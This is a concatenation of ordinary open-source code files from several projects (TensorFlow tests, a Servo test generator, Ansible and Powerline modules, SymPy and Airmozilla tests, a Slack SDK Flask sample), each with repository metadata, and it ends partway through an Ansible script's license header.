tensorflow/compiler/tests/self_adjoint_eig_op_test.py
|
18
|
2194
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.self_adjoint_eig."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.tests import xla_test
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.platform import test
class SelfAdjointEigOpTest(xla_test.XLATestCase, parameterized.TestCase):
def _test(self, dtype, shape):
np.random.seed(1)
x_np = np.random.uniform(
low=-1.0, high=1.0, size=np.prod(shape)).reshape(shape).astype(dtype)
x_np = x_np + np.swapaxes(x_np, -1, -2)
n = shape[-1]
e_np, _ = np.linalg.eigh(x_np)
with self.session() as sess:
x_tf = array_ops.placeholder(dtype)
with self.test_scope():
e, v = linalg_ops.self_adjoint_eig(x_tf)
e_val, v_val = sess.run([e, v], feed_dict={x_tf: x_np})
v_diff = np.matmul(v_val, np.swapaxes(v_val, -1, -2)) - np.eye(n)
self.assertAlmostEqual(np.mean(v_diff**2), 0.0, delta=1e-6)
self.assertAlmostEqual(np.mean((e_val - e_np)**2), 0.0, delta=1e-6)
SIZES = [1, 2, 5, 10, 32]
DTYPES = [np.float32]
PARAMS = itertools.product(SIZES, DTYPES)
@parameterized.parameters(*PARAMS)
def testSelfAdjointEig(self, n, dtype):
for batch_dims in [(), (3,)] + [(3, 2)] * (n < 10):
self._test(dtype, batch_dims + (n, n))
if __name__ == "__main__":
test.main()
|
apache-2.0
|
steveklabnik/servo
|
tests/wpt/web-platform-tests/mixed-content/generic/tools/generate.py
|
96
|
6567
|
#!/usr/bin/env python
import os, sys, json
from common_paths import *
import spec_validator
import argparse
def expand_pattern(expansion_pattern, test_expansion_schema):
expansion = {}
for artifact_key in expansion_pattern:
artifact_value = expansion_pattern[artifact_key]
if artifact_value == '*':
expansion[artifact_key] = test_expansion_schema[artifact_key]
elif isinstance(artifact_value, list):
expansion[artifact_key] = artifact_value
elif isinstance(artifact_value, dict):
# Flattened expansion.
expansion[artifact_key] = []
values_dict = expand_pattern(artifact_value,
test_expansion_schema[artifact_key])
for sub_key in values_dict.keys():
expansion[artifact_key] += values_dict[sub_key]
else:
expansion[artifact_key] = [artifact_value]
return expansion
def permute_expansion(expansion, artifact_order, selection = {}, artifact_index = 0):
assert isinstance(artifact_order, list), "artifact_order should be a list"
if artifact_index >= len(artifact_order):
yield selection
return
artifact_key = artifact_order[artifact_index]
for artifact_value in expansion[artifact_key]:
selection[artifact_key] = artifact_value
for next_selection in permute_expansion(expansion,
artifact_order,
selection,
artifact_index + 1):
yield next_selection
def generate_selection(selection, spec, test_html_template_basename):
selection['spec_name'] = spec['name']
selection['spec_title'] = spec['title']
selection['spec_description'] = spec['description']
selection['spec_specification_url'] = spec['specification_url']
test_filename = test_file_path_pattern % selection
test_headers_filename = test_filename + ".headers"
test_directory = os.path.dirname(test_filename)
full_path = os.path.join(spec_directory, test_directory)
test_html_template = get_template(test_html_template_basename)
test_js_template = get_template("test.js.template")
disclaimer_template = get_template('disclaimer.template')
test_description_template = get_template("test_description.template")
html_template_filename = os.path.join(template_directory,
test_html_template_basename)
generated_disclaimer = disclaimer_template \
% {'generating_script_filename': os.path.relpath(__file__,
test_root_directory),
'html_template_filename': os.path.relpath(html_template_filename,
test_root_directory)}
selection['generated_disclaimer'] = generated_disclaimer.rstrip()
test_description_template = \
test_description_template.rstrip().replace("\n", "\n" + " " * 33)
selection['test_description'] = test_description_template % selection
# Adjust the template for the test invoking JS. Indent it to look nice.
indent = "\n" + " " * 6;
test_js_template = indent + test_js_template.replace("\n", indent);
selection['test_js'] = test_js_template % selection
# Directory for the test files.
try:
os.makedirs(full_path)
except:
pass
# TODO(kristijanburnik): Implement the opt-in-method here.
opt_in_method = selection['opt_in_method']
selection['meta_opt_in'] = ''
if opt_in_method == 'meta-csp':
selection['meta_opt_in'] = '<meta http-equiv="Content-Security-Policy" ' + \
'content="block-all-mixed-content">'
elif opt_in_method == 'http-csp':
opt_in_headers = "Content-Security-Policy: block-all-mixed-content\n"
write_file(test_headers_filename, opt_in_headers)
elif opt_in_method == 'no-opt-in':
pass
else:
raise ValueError("Invalid opt_in_method %s" % opt_in_method)
# Write out the generated HTML file.
write_file(test_filename, test_html_template % selection)
def generate_test_source_files(spec_json, target):
test_expansion_schema = spec_json['test_expansion_schema']
specification = spec_json['specification']
spec_json_js_template = get_template('spec_json.js.template')
write_file(generated_spec_json_filename,
spec_json_js_template % {'spec_json': json.dumps(spec_json)})
# Choose a debug/release template depending on the target.
html_template = "test.%s.html.template" % target
artifact_order = test_expansion_schema.keys() + ['name']
# Create list of excluded tests.
exclusion_dict = {}
for excluded_pattern in spec_json['excluded_tests']:
excluded_expansion = \
expand_pattern(excluded_pattern,
test_expansion_schema)
for excluded_selection in permute_expansion(excluded_expansion, artifact_order):
excluded_selection_path = selection_pattern % excluded_selection
exclusion_dict[excluded_selection_path] = True
for spec in specification:
for expansion_pattern in spec['test_expansion']:
expansion = expand_pattern(expansion_pattern,
test_expansion_schema)
for selection in permute_expansion(expansion, artifact_order):
selection_path = selection_pattern % selection
if not selection_path in exclusion_dict:
generate_selection(selection,
spec,
html_template)
else:
print 'Excluding selection:', selection_path
def main(target, spec_filename):
spec_json = load_spec_json(spec_filename);
spec_validator.assert_valid_spec_json(spec_json)
generate_test_source_files(spec_json, target)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Test suite generator utility')
parser.add_argument('-t', '--target', type = str,
choices = ("release", "debug"), default = "release",
help = 'Sets the appropriate template for generating tests')
parser.add_argument('-s', '--spec', type = str, default = None,
help = 'Specify a file used for describing and generating the tests')
# TODO(kristijanburnik): Add option for the spec_json file.
args = parser.parse_args()
main(args.target, args.spec)
|
mpl-2.0
|
Jorge-Rodriguez/ansible
|
lib/ansible/modules/windows/win_ping.py
|
146
|
1451
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Michael DeHaan <[email protected]>, and others
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_ping
version_added: "1.7"
short_description: A windows version of the classic ping module
description:
- Checks management connectivity of a windows host.
- This is NOT ICMP ping, this is just a trivial test module.
- For non-Windows targets, use the M(ping) module instead.
- For Network targets, use the M(net_ping) module instead.
options:
data:
description:
- Alternate data to return instead of 'pong'.
- If this parameter is set to C(crash), the module will cause an exception.
type: str
default: pong
seealso:
- module: ping
author:
- Chris Church (@cchurch)
'''
EXAMPLES = r'''
# Test connectivity to a windows host
# ansible winserver -m win_ping
- name: Example from an Ansible Playbook
win_ping:
- name: Induce an exception to see what happens
win_ping:
data: crash
'''
RETURN = r'''
ping:
description: Value provided with the data parameter.
returned: success
type: str
sample: pong
'''
|
gpl-3.0
|
debugger22/sympy
|
sympy/physics/quantum/tests/test_operator.py
|
97
|
6870
|
from sympy import (Derivative, diff, Function, Integer, Mul, pi, sin, Symbol,
symbols)
from sympy.physics.quantum.qexpr import QExpr
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.hilbert import HilbertSpace
from sympy.physics.quantum.operator import (Operator, UnitaryOperator,
HermitianOperator, OuterProduct,
DifferentialOperator,
IdentityOperator)
from sympy.physics.quantum.state import Ket, Bra, Wavefunction
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.represent import represent
from sympy.core.trace import Tr
from sympy.physics.quantum.spin import JzKet, JzBra
from sympy.matrices import eye
class CustomKet(Ket):
@classmethod
def default_args(self):
return ("t",)
class CustomOp(HermitianOperator):
@classmethod
def default_args(self):
return ("T",)
t_ket = CustomKet()
t_op = CustomOp()
def test_operator():
A = Operator('A')
B = Operator('B')
C = Operator('C')
assert isinstance(A, Operator)
assert isinstance(A, QExpr)
assert A.label == (Symbol('A'),)
assert A.is_commutative is False
assert A.hilbert_space == HilbertSpace()
assert A*B != B*A
assert (A*(B + C)).expand() == A*B + A*C
assert ((A + B)**2).expand() == A**2 + A*B + B*A + B**2
assert t_op.label[0] == Symbol(t_op.default_args()[0])
assert Operator() == Operator("O")
assert A*IdentityOperator() == A
def test_operator_inv():
A = Operator('A')
assert A*A.inv() == 1
assert A.inv()*A == 1
def test_hermitian():
H = HermitianOperator('H')
assert isinstance(H, HermitianOperator)
assert isinstance(H, Operator)
assert Dagger(H) == H
assert H.inv() != H
assert H.is_commutative is False
assert Dagger(H).is_commutative is False
def test_unitary():
U = UnitaryOperator('U')
assert isinstance(U, UnitaryOperator)
assert isinstance(U, Operator)
assert U.inv() == Dagger(U)
assert U*Dagger(U) == 1
assert Dagger(U)*U == 1
assert U.is_commutative is False
assert Dagger(U).is_commutative is False
def test_identity():
I = IdentityOperator()
O = Operator('O')
x = Symbol("x")
assert isinstance(I, IdentityOperator)
assert isinstance(I, Operator)
assert I * O == O
assert O * I == O
assert isinstance(I * I, IdentityOperator)
assert isinstance(3 * I, Mul)
assert isinstance(I * x, Mul)
assert I.inv() == I
assert Dagger(I) == I
assert qapply(I * O) == O
assert qapply(O * I) == O
for n in [2, 3, 5]:
assert represent(IdentityOperator(n)) == eye(n)
def test_outer_product():
k = Ket('k')
b = Bra('b')
op = OuterProduct(k, b)
assert isinstance(op, OuterProduct)
assert isinstance(op, Operator)
assert op.ket == k
assert op.bra == b
assert op.label == (k, b)
assert op.is_commutative is False
op = k*b
assert isinstance(op, OuterProduct)
assert isinstance(op, Operator)
assert op.ket == k
assert op.bra == b
assert op.label == (k, b)
assert op.is_commutative is False
op = 2*k*b
assert op == Mul(Integer(2), k, b)
op = 2*(k*b)
assert op == Mul(Integer(2), OuterProduct(k, b))
assert Dagger(k*b) == OuterProduct(Dagger(b), Dagger(k))
assert Dagger(k*b).is_commutative is False
#test the _eval_trace
assert Tr(OuterProduct(JzKet(1, 1), JzBra(1, 1))).doit() == 1
# test scaled kets and bras
assert OuterProduct(2 * k, b) == 2 * OuterProduct(k, b)
assert OuterProduct(k, 2 * b) == 2 * OuterProduct(k, b)
# test sums of kets and bras
k1, k2 = Ket('k1'), Ket('k2')
b1, b2 = Bra('b1'), Bra('b2')
assert (OuterProduct(k1 + k2, b1) ==
OuterProduct(k1, b1) + OuterProduct(k2, b1))
assert (OuterProduct(k1, b1 + b2) ==
OuterProduct(k1, b1) + OuterProduct(k1, b2))
assert (OuterProduct(1 * k1 + 2 * k2, 3 * b1 + 4 * b2) ==
3 * OuterProduct(k1, b1) +
4 * OuterProduct(k1, b2) +
6 * OuterProduct(k2, b1) +
8 * OuterProduct(k2, b2))
def test_operator_dagger():
A = Operator('A')
B = Operator('B')
assert Dagger(A*B) == Dagger(B)*Dagger(A)
assert Dagger(A + B) == Dagger(A) + Dagger(B)
assert Dagger(A**2) == Dagger(A)**2
def test_differential_operator():
x = Symbol('x')
f = Function('f')
d = DifferentialOperator(Derivative(f(x), x), f(x))
g = Wavefunction(x**2, x)
assert qapply(d*g) == Wavefunction(2*x, x)
assert d.expr == Derivative(f(x), x)
assert d.function == f(x)
assert d.variables == (x,)
assert diff(d, x) == DifferentialOperator(Derivative(f(x), x, 2), f(x))
d = DifferentialOperator(Derivative(f(x), x, 2), f(x))
g = Wavefunction(x**3, x)
assert qapply(d*g) == Wavefunction(6*x, x)
assert d.expr == Derivative(f(x), x, 2)
assert d.function == f(x)
assert d.variables == (x,)
assert diff(d, x) == DifferentialOperator(Derivative(f(x), x, 3), f(x))
d = DifferentialOperator(1/x*Derivative(f(x), x), f(x))
assert d.expr == 1/x*Derivative(f(x), x)
assert d.function == f(x)
assert d.variables == (x,)
assert diff(d, x) == \
DifferentialOperator(Derivative(1/x*Derivative(f(x), x), x), f(x))
assert qapply(d*g) == Wavefunction(3*x, x)
# 2D cartesian Laplacian
y = Symbol('y')
d = DifferentialOperator(Derivative(f(x, y), x, 2) +
Derivative(f(x, y), y, 2), f(x, y))
w = Wavefunction(x**3*y**2 + y**3*x**2, x, y)
assert d.expr == Derivative(f(x, y), x, 2) + Derivative(f(x, y), y, 2)
assert d.function == f(x, y)
assert d.variables == (x, y)
assert diff(d, x) == \
DifferentialOperator(Derivative(d.expr, x), f(x, y))
assert diff(d, y) == \
DifferentialOperator(Derivative(d.expr, y), f(x, y))
assert qapply(d*w) == Wavefunction(2*x**3 + 6*x*y**2 + 6*x**2*y + 2*y**3,
x, y)
# 2D polar Laplacian (th = theta)
r, th = symbols('r th')
d = DifferentialOperator(1/r*Derivative(r*Derivative(f(r, th), r), r) +
1/(r**2)*Derivative(f(r, th), th, 2), f(r, th))
w = Wavefunction(r**2*sin(th), r, (th, 0, pi))
assert d.expr == \
1/r*Derivative(r*Derivative(f(r, th), r), r) + \
1/(r**2)*Derivative(f(r, th), th, 2)
assert d.function == f(r, th)
assert d.variables == (r, th)
assert diff(d, r) == \
DifferentialOperator(Derivative(d.expr, r), f(r, th))
assert diff(d, th) == \
DifferentialOperator(Derivative(d.expr, th), f(r, th))
assert qapply(d*w) == Wavefunction(3*sin(th), r, (th, 0, pi))
|
bsd-3-clause
|
lukw00/powerline
|
powerline/bindings/vim/__init__.py
|
18
|
11437
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import codecs
try:
import vim
except ImportError:
vim = object()
from powerline.lib.unicode import unicode
if (
hasattr(vim, 'options')
and hasattr(vim, 'vvars')
and vim.vvars['version'] > 703
):
if sys.version_info < (3,):
def get_vim_encoding():
return vim.options['encoding'] or 'ascii'
else:
def get_vim_encoding():
return vim.options['encoding'].decode('ascii') or 'ascii'
elif hasattr(vim, 'eval'):
def get_vim_encoding():
return vim.eval('&encoding') or 'ascii'
else:
def get_vim_encoding():
return 'utf-8'
get_vim_encoding.__doc__ = (
'''Get encoding used for Vim strings
:return:
Value of ``&encoding``. If it is empty (i.e. Vim is compiled
without +multibyte) returns ``'ascii'``. When building documentation
outputs ``'utf-8'`` unconditionally.
'''
)
vim_encoding = get_vim_encoding()
python_to_vim_types = {
unicode: (
lambda o: b'\'' + (o.translate({
ord('\''): '\'\'',
}).encode(vim_encoding)) + b'\''
),
list: (
lambda o: b'[' + (
b','.join((python_to_vim(i) for i in o))
) + b']'
),
bytes: (lambda o: b'\'' + o.replace(b'\'', b'\'\'') + b'\''),
int: (str if str is bytes else (lambda o: unicode(o).encode('ascii'))),
}
python_to_vim_types[float] = python_to_vim_types[int]
def python_to_vim(o):
return python_to_vim_types[type(o)](o)
if sys.version_info < (3,):
def str_to_bytes(s):
return s
def unicode_eval(expr):
ret = vim.eval(expr)
return ret.decode(vim_encoding, 'powerline_vim_strtrans_error')
else:
def str_to_bytes(s):
return s.encode(vim_encoding)
def unicode_eval(expr):
return vim.eval(expr)
def safe_bytes_eval(expr):
return bytes(bytearray((
int(chunk) for chunk in (
vim.eval(
b'substitute(' + expr + b', ' +
b'\'^.*$\', \'\\=join(map(range(len(submatch(0))), ' +
b'"char2nr(submatch(0)[v:val])"))\', "")'
).split()
)
)))
def eval_bytes(expr):
try:
return str_to_bytes(vim.eval(expr))
except UnicodeDecodeError:
return safe_bytes_eval(expr)
def eval_unicode(expr):
try:
return unicode_eval(expr)
except UnicodeDecodeError:
return safe_bytes_eval(expr).decode(vim_encoding, 'powerline_vim_strtrans_error')
if hasattr(vim, 'bindeval'):
rettype_func = {
None: lambda f: f,
'unicode': (
lambda f: (
lambda *args, **kwargs: (
f(*args, **kwargs).decode(
vim_encoding, 'powerline_vim_strtrans_error'
))))
}
rettype_func['int'] = rettype_func['bytes'] = rettype_func[None]
rettype_func['str'] = rettype_func['bytes'] if str is bytes else rettype_func['unicode']
def vim_get_func(f, rettype=None):
'''Return a vim function binding.'''
try:
func = vim.bindeval('function("' + f + '")')
except vim.error:
return None
else:
return rettype_func[rettype](func)
else:
rettype_eval = {
None: getattr(vim, 'eval', None),
'int': lambda expr: int(vim.eval(expr)),
'bytes': eval_bytes,
'unicode': eval_unicode,
}
rettype_eval['str'] = rettype_eval[None]
class VimFunc(object):
'''Evaluate a vim function using vim.eval().
This is a fallback class for older vim versions.
'''
__slots__ = ('f', 'eval')
def __init__(self, f, rettype=None):
self.f = f.encode('utf-8')
self.eval = rettype_eval[rettype]
def __call__(self, *args):
return self.eval(self.f + b'(' + (b','.join((
python_to_vim(o) for o in args
))) + b')')
vim_get_func = VimFunc
def vim_get_autoload_func(f, rettype=None):
func = vim_get_func(f)
if not func:
vim.command('runtime! ' + f.replace('#', '/')[:f.rindex('#')] + '.vim')
func = vim_get_func(f)
return func
if hasattr(vim, 'Function'):
def vim_func_exists(f):
try:
vim.Function(f)
except ValueError:
return False
else:
return True
else:
def vim_func_exists(f):
try:
return bool(int(vim.eval('exists("*{0}")'.format(f))))
except vim.error:
return False
if type(vim) is object:
vim_get_func = lambda *args, **kwargs: None
_getbufvar = vim_get_func('getbufvar')
_vim_exists = vim_get_func('exists', rettype='int')
# It may crash on some old vim versions and I do not remember in which patch
# I fixed this crash.
if hasattr(vim, 'vvars') and vim.vvars[str('version')] > 703:
_vim_to_python_types = {
getattr(vim, 'Dictionary', None) or type(vim.bindeval('{}')):
lambda value: dict((
(_vim_to_python(k), _vim_to_python(v))
for k, v in value.items()
)),
getattr(vim, 'List', None) or type(vim.bindeval('[]')):
lambda value: [_vim_to_python(item) for item in value],
getattr(vim, 'Function', None) or type(vim.bindeval('function("mode")')):
lambda _: None,
}
def vim_getvar(varname):
return _vim_to_python(vim.vars[str(varname)])
def bufvar_exists(buffer, varname):
buffer = buffer or vim.current.buffer
return varname in buffer.vars
def vim_getwinvar(segment_info, varname):
return _vim_to_python(segment_info['window'].vars[str(varname)])
def vim_global_exists(name):
try:
vim.vars[name]
except KeyError:
return False
else:
return True
else:
_vim_to_python_types = {
dict: (lambda value: dict(((k, _vim_to_python(v)) for k, v in value.items()))),
list: (lambda value: [_vim_to_python(i) for i in value]),
}
def vim_getvar(varname):
varname = 'g:' + varname
if _vim_exists(varname):
return vim.eval(varname)
else:
raise KeyError(varname)
def bufvar_exists(buffer, varname):
if not buffer or buffer.number == vim.current.buffer.number:
return int(vim.eval('exists("b:{0}")'.format(varname)))
else:
return int(vim.eval(
'has_key(getbufvar({0}, ""), {1})'.format(buffer.number, varname)
))
def vim_getwinvar(segment_info, varname):
result = vim.eval('getwinvar({0}, "{1}")'.format(segment_info['winnr'], varname))
if result == '':
if not int(vim.eval('has_key(getwinvar({0}, ""), "{1}")'.format(segment_info['winnr'], varname))):
raise KeyError(varname)
return result
def vim_global_exists(name):
return int(vim.eval('exists("g:' + name + '")'))
def vim_command_exists(name):
return _vim_exists(':' + name)
if sys.version_info < (3,):
getbufvar = _getbufvar
else:
_vim_to_python_types[bytes] = lambda value: value.decode(vim_encoding)
def getbufvar(*args):
return _vim_to_python(_getbufvar(*args))
_id = lambda value: value
def _vim_to_python(value):
return _vim_to_python_types.get(type(value), _id)(value)
if hasattr(vim, 'options'):
def vim_getbufoption(info, option):
return info['buffer'].options[str(option)]
def vim_getoption(option):
return vim.options[str(option)]
def vim_setoption(option, value):
vim.options[str(option)] = value
else:
def vim_getbufoption(info, option):
return getbufvar(info['bufnr'], '&' + option)
def vim_getoption(option):
return vim.eval('&g:' + option)
def vim_setoption(option, value):
vim.command('let &g:{option} = {value}'.format(
option=option, value=python_to_vim(value)))
if hasattr(vim, 'tabpages'):
current_tabpage = lambda: vim.current.tabpage
list_tabpages = lambda: vim.tabpages
def list_tabpage_buffers_segment_info(segment_info):
return (
{'buffer': window.buffer, 'bufnr': window.buffer.number}
for window in segment_info['tabpage'].windows
)
else:
class FalseObject(object):
@staticmethod
def __nonzero__():
return False
__bool__ = __nonzero__
def get_buffer(number):
for buffer in vim.buffers:
if buffer.number == number:
return buffer
raise KeyError(number)
class WindowVars(object):
__slots__ = ('tabnr', 'winnr')
def __init__(self, window):
self.tabnr = window.tabnr
self.winnr = window.number
def __getitem__(self, key):
has_key = vim.eval('has_key(gettabwinvar({0}, {1}, ""), "{2}")'.format(self.tabnr, self.winnr, key))
if has_key == '0':
raise KeyError
return vim.eval('gettabwinvar({0}, {1}, "{2}")'.format(self.tabnr, self.winnr, key))
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
class Window(FalseObject):
__slots__ = ('tabnr', 'number', '_vars')
def __init__(self, tabnr, number):
self.tabnr = tabnr
self.number = number
self.vars = WindowVars(self)
@property
def buffer(self):
return get_buffer(int(vim.eval('tabpagebuflist({0})[{1}]'.format(self.tabnr, self.number - 1))))
class Tabpage(FalseObject):
__slots__ = ('number',)
def __init__(self, number):
self.number = number
def __eq__(self, tabpage):
if not isinstance(tabpage, Tabpage):
raise NotImplementedError
return self.number == tabpage.number
@property
def window(self):
return Window(self.number, int(vim.eval('tabpagewinnr({0})'.format(self.number))))
def _last_tab_nr():
return int(vim.eval('tabpagenr("$")'))
def current_tabpage():
return Tabpage(int(vim.eval('tabpagenr()')))
def list_tabpages():
return [Tabpage(nr) for nr in range(1, _last_tab_nr() + 1)]
class TabBufSegmentInfo(dict):
def __getitem__(self, key):
try:
return super(TabBufSegmentInfo, self).__getitem__(key)
except KeyError:
if key != 'buffer':
raise
else:
buffer = get_buffer(super(TabBufSegmentInfo, self).__getitem__('bufnr'))
self['buffer'] = buffer
return buffer
def list_tabpage_buffers_segment_info(segment_info):
return (
TabBufSegmentInfo(bufnr=int(bufnrstr))
for bufnrstr in vim.eval('tabpagebuflist({0})'.format(segment_info['tabnr']))
)
class VimEnviron(object):
@staticmethod
def __getitem__(key):
return vim.eval('$' + key)
@staticmethod
def get(key, default=None):
return vim.eval('$' + key) or default
@staticmethod
def __setitem__(key, value):
return vim.command(
'let ${0}="{1}"'.format(
key,
value.replace('"', '\\"')
.replace('\\', '\\\\')
.replace('\n', '\\n')
.replace('\0', '')
)
)
if sys.version_info < (3,):
def buffer_name(segment_info):
return segment_info['buffer'].name
else:
vim_bufname = vim_get_func('bufname', rettype='bytes')
def buffer_name(segment_info):
try:
name = segment_info['buffer'].name
except UnicodeDecodeError:
return vim_bufname(segment_info['bufnr'])
else:
return name.encode(segment_info['encoding']) if name else None
vim_strtrans = vim_get_func('strtrans', rettype='unicode')
def powerline_vim_strtrans_error(e):
if not isinstance(e, UnicodeDecodeError):
raise NotImplementedError
text = vim_strtrans(e.object[e.start:e.end])
return (text, e.end)
codecs.register_error('powerline_vim_strtrans_error', powerline_vim_strtrans_error)
did_autocmd = False
buffer_caches = []
def register_buffer_cache(cachedict):
global did_autocmd
global buffer_caches
from powerline.vim import get_default_pycmd, pycmd
if not did_autocmd:
import __main__
__main__.powerline_on_bwipe = on_bwipe
vim.command('augroup Powerline')
vim.command(' autocmd! BufWipeout * :{pycmd} powerline_on_bwipe()'.format(
pycmd=(pycmd or get_default_pycmd())))
vim.command('augroup END')
did_autocmd = True
buffer_caches.append(cachedict)
return cachedict
def on_bwipe():
global buffer_caches
bufnr = int(vim.eval('expand("<abuf>")'))
for cachedict in buffer_caches:
cachedict.pop(bufnr, None)
environ = VimEnviron()
def create_ruby_dpowerline():
vim.command((
'''
ruby
if $powerline == nil
class Powerline
end
$powerline = Powerline.new
end
'''
))
|
mit
|
mythmon/airmozilla
|
airmozilla/manage/tests/views/test_tags.py
|
1
|
3865
|
import json
from nose.tools import eq_, ok_
from funfactory.urlresolvers import reverse
from airmozilla.main.models import Tag, Event
from .base import ManageTestCase
class TestTags(ManageTestCase):
def test_tags(self):
"""Tag management pages return successfully."""
response = self.client.get(reverse('manage:tags'))
eq_(response.status_code, 200)
def test_tags_data(self):
Tag.objects.create(name='testing')
url = reverse('manage:tags_data')
response = self.client.get(url)
eq_(response.status_code, 200)
content = json.loads(response.content)
ok_(content['tags'])
ok_(content['urls'])
eq_(
content['urls']['manage:tag_edit'],
reverse('manage:tag_edit', args=('0',))
)
eq_(
content['urls']['manage:tag_remove'],
reverse('manage:tag_remove', args=('0',))
)
def test_tag_remove(self):
"""Removing a tag works correctly and leaves associated events
with null tags."""
event = Event.objects.get(id=22)
tag = Tag.objects.create(name='testing')
event.tags.add(tag)
assert tag in event.tags.all()
event.tags.add(Tag.objects.create(name='othertag'))
eq_(event.tags.all().count(), 2)
self._delete_test(tag, 'manage:tag_remove', 'manage:tags')
event = Event.objects.get(id=22)
eq_(event.tags.all().count(), 1)
def test_tag_edit(self):
"""Test tag editor; timezone switch works correctly."""
tag = Tag.objects.create(name='testing')
url = reverse('manage:tag_edit', kwargs={'id': tag.id})
response = self.client.get(url)
eq_(response.status_code, 200)
response = self.client.post(url, {
'name': 'different',
})
self.assertRedirects(response, reverse('manage:tags'))
tag = Tag.objects.get(id=tag.id)
eq_(tag.name, 'different')
Tag.objects.create(name='alreadyinuse')
response = self.client.post(url, {
'name': 'ALREADYINUSE',
})
eq_(response.status_code, 302)
# because this is causeing a duplicate it redirects back
self.assertRedirects(response, url)
eq_(Tag.objects.filter(name__iexact='Alreadyinuse').count(), 2)
def test_tag_merge(self):
t1 = Tag.objects.create(name='Tagg')
t2 = Tag.objects.create(name='TaGG')
t3 = Tag.objects.create(name='tAgg')
event = Event.objects.get(title='Test event')
event.tags.add(t1)
event2 = Event.objects.create(
title='Other Title',
start_time=event.start_time,
)
event2.tags.add(t1)
event2.tags.add(t2)
event3 = Event.objects.create(
title='Other Title Again',
start_time=event.start_time,
)
event3.tags.add(t2)
event3.tags.add(t3)
# t1 is now repeated
edit_url = reverse('manage:tag_edit', args=(t1.id,))
response = self.client.get(edit_url)
eq_(response.status_code, 200)
merge_url = reverse('manage:tag_merge', args=(t1.id,))
ok_(merge_url in response.content)
response = self.client.post(merge_url, {'keep': t2.id})
eq_(response.status_code, 302)
self.assertRedirects(
response,
reverse('manage:tags')
)
eq_(Tag.objects.filter(name__iexact='TAGG').count(), 1)
eq_(Tag.objects.filter(name='TaGG').count(), 1)
eq_(Tag.objects.filter(name='Tagg').count(), 0)
eq_(Tag.objects.filter(name='tAgg').count(), 0)
eq_(Event.objects.filter(tags__name='TaGG').count(), 3)
eq_(Event.objects.filter(tags__name='Tagg').count(), 0)
eq_(Event.objects.filter(tags__name='tAgg').count(), 0)
|
bsd-3-clause
|
slackhq/python-slackclient
|
integration_tests/samples/basic_usage/views_2.py
|
1
|
3819
|
import json
import logging
logging.basicConfig(level=logging.DEBUG)
# ---------------------
# Slack WebClient
# ---------------------
import os
from slack_sdk.web import WebClient
from slack_sdk.errors import SlackApiError
from slack_sdk.signature import SignatureVerifier
from slack_sdk.models.blocks import InputBlock, SectionBlock
from slack_sdk.models.blocks.block_elements import PlainTextInputElement
from slack_sdk.models.blocks.basic_components import PlainTextObject
from slack_sdk.models.views import View
client = WebClient(token=os.environ["SLACK_BOT_TOKEN"])
signature_verifier = SignatureVerifier(os.environ["SLACK_SIGNING_SECRET"])
# ---------------------
# Flask App
# ---------------------
# pip3 install flask
from flask import Flask, request, make_response, jsonify
app = Flask(__name__)
@app.route("/slack/events", methods=["POST"])
def slack_app():
if not signature_verifier.is_valid_request(request.get_data(), request.headers):
return make_response("invalid request", 403)
if "payload" in request.form:
payload = json.loads(request.form["payload"])
if payload["type"] == "shortcut" and payload["callback_id"] == "test-shortcut":
# Open a new modal by a global shortcut
try:
view = View(
type="modal",
callback_id="modal-id",
title=PlainTextObject(text="Awesome Modal"),
submit=PlainTextObject(text="Submit"),
close=PlainTextObject(text="Cancel"),
blocks=[
InputBlock(
block_id="b-id",
label=PlainTextObject(text="Input label"),
element=PlainTextInputElement(action_id="a-id"),
)
],
)
api_response = client.views_open(
trigger_id=payload["trigger_id"],
view=view,
)
return make_response("", 200)
except SlackApiError as e:
code = e.response["error"]
return make_response(f"Failed to open a modal due to {code}", 200)
if (
payload["type"] == "view_submission"
and payload["view"]["callback_id"] == "modal-id"
):
# Handle a data submission request from the modal
submitted_data = payload["view"]["state"]["values"]
print(
submitted_data
) # {'b-id': {'a-id': {'type': 'plain_text_input', 'value': 'your input'}}}
return make_response(
jsonify(
{
"response_action": "update",
"view": View(
type="modal",
callback_id="modal-id",
title=PlainTextObject(text="Accepted"),
close=PlainTextObject(text="Close"),
blocks=[
SectionBlock(
block_id="b-id",
text=PlainTextObject(
text="Thanks for submitting the data!"
),
)
],
).to_dict(),
}
),
200,
)
return make_response("", 404)
if __name__ == "__main__":
# export SLACK_SIGNING_SECRET=***
# export SLACK_API_TOKEN=xoxb-***
# export FLASK_ENV=development
# python3 integration_tests/samples/basic_usage/views_2.py
app.run("localhost", 3000)
# ngrok http 3000
|
mit
|
pgmillon/ansible
|
test/utils/shippable/tools/run.py
|
29
|
3634
|
#!/usr/bin/env python
# PYTHON_ARGCOMPLETE_OK
# (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
